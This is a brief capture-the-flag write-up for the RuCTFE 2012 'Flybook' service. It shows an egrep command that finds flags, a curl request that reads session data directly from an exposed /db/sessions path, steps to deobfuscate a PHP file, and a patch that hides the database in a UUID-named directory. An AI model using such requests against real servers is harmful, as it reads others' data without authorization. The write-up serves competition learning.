Lobotomy Team

RuCTFE 2012 -- Flybook

Write-up Flybook

Whereis flags ?

egrep -R -e '\w{31}=' /var/www/
And we see that they in /var/www/db/sessions

How to get flags ?

curl http://ip/db/sessions
really easy ? =)

Now we should make patch:

Lets look at lib/db.php - it's obfuscated.
This is simple obfuscation, we could deobfuscate this code very quickly.
  • make this code readable - I like to use "Sublime Text 2" and this code got readable form in 2 minutes.
  • we see that we have 3 part of php code.
    • In the first part make: print_r($GLOBALS['_1392131239_']);
      and replace all $GLOBALS['_1392131239_'][x] from the 3rd part to the equals from printed array.
    • In the second part make: 
      for($i=0;$i&lt30;$i++)
	echo base64_decode($a[$i]);

      and make replace of _1092662562(x) from the 3rd part to the printed equals.

What can we see here ?

Right, path to db: 

function dbname($x_0){
	return 'db/' .substr($x_0,round(0),-round(0+5));
}
uuid
26362220-36ec-11e2-a216-0016e6846163

cp -R /var/www/db /var/www/26362220-36ec-11e2-a216-0016e6846163

and fix db.php 

function dbname($x_0){
	return '26362220-36ec-11e2-a216-0016e6846163/' .substr($x_0,round(0),-round(0+5));
}